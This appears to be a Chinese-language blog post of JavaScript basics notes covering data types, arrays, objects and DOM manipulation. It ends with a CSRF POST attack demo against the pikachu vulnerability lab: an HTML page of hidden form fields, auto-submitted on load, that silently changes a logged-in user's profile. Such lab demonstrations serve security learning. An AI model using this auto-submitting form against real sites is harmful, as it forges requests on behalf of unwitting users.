javaScript基础

Veröffentlicht am

每次记一点

数据类型

javaScript的数据类型有:字符串、数字、布尔、数组、对象、Null、Undefined

JavaScript 拥有动态类型。这意味着相同的变量可用作不同的类型:

1
2
3
var x                // x 为 undefined
var x = 6;           // x 为数字
var x = "Bill";      // x 为字符串

JavaScript 数字

js只有一种数字类型。数字可以带小数点,也可以不带

1
2
var x1=34.00;      //使用小数点来写
var x2=34;         //不使用小数点来写

JavaScript 数组

下面的代码创建名为 cars 的数组:

1
2
3
4
var cars=new Array();
cars[0]="Audi";
cars[1]="BMW";
cars[2]="Volvo";

或者

1
var cars=["Audi","BMW","Volvo"];

JavaScript 对象

对象由花括号分隔。在括号内部,对象的属性以名称和值对的形式 (name : value) 来定义。属性由逗号分隔:

1
var person={firstname:"Bill", lastname:"Gates", id:5566};

上面的例子中的对象(person)有三个属性:firstname,lastname以及id.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<!DOCTYPE html>
<html>
<body>

<script>
var person={
firstname : "Bill",
lastname  : "Gates",
id        :  5566
};
document.write(person.lastname + "<br />");
document.write(person["lastname"] + "<br />");
</script>

</body>
</html>

输出:

1
2
Gates
Gates

声明变量类型

当您声明新变量时,可以使用关键词 “new” 来声明其类型:

1
2
3
4
5
var carname=new String;
var x=      new Number;
var y=      new Boolean;
var cars=   new Array;
var person= new Object;

JavaScript 变量均为对象。当您声明一个变量时,就创建了一个新的对象。

JavaScript HTML DOM

通过 HTML DOM,可访问 JavaScript HTML 文档的所有元素。

当网页被加载时,浏览器会创建页面的文档对象模型(Document Object Model)。

HTML DOM 模型被构造为对象的树。

通过可编程的对象模型,JavaScript 获得了足够的能力来创建动态的 HTML。

JavaScript 能够改变页面中的所有 HTML 元素
JavaScript 能够改变页面中的所有 HTML 属性
JavaScript 能够改变页面中的所有 CSS 样式
JavaScript 能够对页面中的所有事件做出反应

JavaScript HTML DOM –改变HTML

改变HTML元素的内容

语法:

1
document.getElementById(id).innerHTML=new HTML

实例:

1
2
3
4
5
6
7
8
9
10
11
<html>
<body>

<p id="p1">Hello World!</p>

<script>
document.getElementById("p1").innerHTML="New text!";
</script>

</body>
</html>

改变HTML元素的属性

语法:

1
document.getElementById(id).attribute=new value

实例:

1
2
3
4
5
6
7
8
9
10
11
12
<!DOCTYPE html>
<html>
<body>

<img id="image" src="smiley.gif">

<script>
document.getElementById("image").src="landscape.jpg";
</script>

</body>
</html>

使用javaScript 进行CSRF的post型攻击

这里使用pikachu漏洞平台的CSRF-POST演示
创建一个表单,代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
<html>
<head>
	<title>
		post data
	</title>
</head>
<body>

	<form id="myform" method="post" action="http://192.168.43.40/pikachu/vul/csrf/csrfpost/csrf_post_edit.php">

		<input type="hidden" name="sex" value="22222">
		<input type="hidden" name="phonenum" value="22222">
	    <input type="hidden" name="add" value="22222">
	    <input type="hidden" name="email" value="22222">
	</form>

	<script>
		var myform = document.getElementById("myform");
		myform.submit();
	</script>
</body>
</html>

0%